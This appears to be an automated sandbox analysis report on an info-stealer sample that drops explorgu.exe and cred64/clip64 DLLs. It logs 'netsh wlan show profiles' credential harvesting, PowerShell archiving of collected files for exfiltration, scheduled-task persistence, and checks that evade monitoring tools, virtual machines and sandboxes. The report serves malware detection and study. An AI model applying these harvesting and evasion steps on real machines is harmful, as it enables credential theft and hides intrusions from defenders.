                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: cred64.dll.5.dr, cred64[1].dll.5.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                Source: wIaKimJFke.exeReversingLabs: Detection: 71%
                                Source: wIaKimJFke.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorgu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: explorgu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile read: C:\Users\user\Desktop\wIaKimJFke.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\wIaKimJFke.exe "C:\Users\user\Desktop\wIaKimJFke.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, MainJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, MainJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, MainJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
                                Source: wIaKimJFke.exeStatic file information: File size 1906688 > 1048576
                                Source: wIaKimJFke.exeStatic PE information: Raw size of qrqrzugw is bigger than: 0x100000 < 0x1a0400
                                Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr

                                Data Obfuscation

                                barindex
                                Detected unpacking (changes PE section rights)
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeUnpacked PE file: 0.2.wIaKimJFke.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeUnpacked PE file: 1.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeUnpacked PE file: 5.2.explorgu.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qrqrzugw:EW;ajeqznom:EW;.taggant:EW;
                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                Source: cred64[1].dll.5.drStatic PE information: real checksum: 0x0 should be: 0x14318c
                                Source: clip64.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x2b5a5
                                Source: explorgu.exe.0.drStatic PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
                                Source: clip64[1].dll.5.drStatic PE information: real checksum: 0x0 should be: 0x2b5a5
                                Source: wIaKimJFke.exeStatic PE information: real checksum: 0x1dd93d should be: 0x1d8f6e
                                Source: cred64.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x14318c
                                Source: wIaKimJFke.exeStatic PE information: section name:
                                Source: wIaKimJFke.exeStatic PE information: section name: .idata
                                Source: wIaKimJFke.exeStatic PE information: section name:
                                Source: wIaKimJFke.exeStatic PE information: section name: qrqrzugw
                                Source: wIaKimJFke.exeStatic PE information: section name: ajeqznom
                                Source: wIaKimJFke.exeStatic PE information: section name: .taggant
                                Source: explorgu.exe.0.drStatic PE information: section name:
                                Source: explorgu.exe.0.drStatic PE information: section name: .idata
                                Source: explorgu.exe.0.drStatic PE information: section name:
                                Source: explorgu.exe.0.drStatic PE information: section name: qrqrzugw
                                Source: explorgu.exe.0.drStatic PE information: section name: ajeqznom
                                Source: explorgu.exe.0.drStatic PE information: section name: .taggant
                                Source: cred64[1].dll.5.drStatic PE information: section name: _RDATA
                                Source: cred64.dll.5.drStatic PE information: section name: _RDATA
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_004FD2A1 push ecx; ret 0_2_004FD29F
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E2269E6 push ecx; ret 10_2_6E2269F9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B700942 push E95B63D0h; ret 11_2_00007FFD9B7009C9
                                Source: wIaKimJFke.exeStatic PE information: section name: entropy: 7.985573734729088
                                Source: wIaKimJFke.exeStatic PE information: section name: qrqrzugw entropy: 7.952553763382188
                                Source: explorgu.exe.0.drStatic PE information: section name: entropy: 7.985573734729088
                                Source: explorgu.exe.0.drStatic PE information: section name: qrqrzugw entropy: 7.952553763382188
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile created: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllJump to dropped file
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJump to dropped file

                                Boot Survival

                                barindex
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile created: C:\Windows\Tasks\explorgu.jobJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-11224
                                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Tries to detect virtualization through RDTSC time measurements
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 54BAE0 second address: 54BAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C6104 second address: 6C613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED7550886Ch 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 jl 00007FED75508866h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6C524B second address: 6C525F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
